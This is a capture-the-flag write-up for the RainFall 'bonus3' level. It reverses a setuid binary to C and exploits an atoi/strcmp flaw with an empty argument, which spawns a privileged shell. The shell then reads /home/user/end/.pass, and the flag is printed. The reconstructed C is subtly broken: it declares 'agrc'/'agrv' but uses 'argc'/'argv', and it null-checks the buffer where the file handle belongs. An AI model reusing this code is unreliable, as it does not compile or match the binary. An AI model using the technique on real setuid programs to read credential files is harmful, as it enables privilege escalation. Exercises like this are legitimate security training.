
```bash
bonus3@RainFall:~$ ls -la
-rwsr-s---+ 1 end    users  5595 Mar  6  2016 bonus3

bonus3@RainFall:~$ file bonus3 
bonus3: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x530d693450de037e44d1186904401c8f8064874b, not stripped
```

Reversed in c:
```c
int main(int agrc, const char **agrv, const char **envp)
{
    char ptr[132];
    FILE *pass;

    pass = fopen("/home/user/end/.pass", "r");
    memset(ptr, 0, sizeof(ptr));
    if (ptr == NULL || argc != 2)
    {
        return -1;
    }
    fread(ptr, 1, 66, pass);
    ptr[65] = '\0';
    ptr[atoi(agrv[1])] = '\0';
    fclose(pass);
    if (strcmp(ptr, argv[1]) == 0)
    {
        execl("/bin/sh", "sh", 0);
    }
    else
    {
        puts(&ptr[66]);
    }
    return 0;
}
```

To pass the `strcmp()` check we need the `argv[1]` to be egual to `ptr`
We don't know the value of `ptr` so the only good way to do it is to set it at 0
With a empty string `atoi()` will return `0` and `strcmp()` will compare too empty string

```bash
bonus3@RainFall:~$ ./bonus3 ""
$ cat /home/user/end/.pass
3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c
```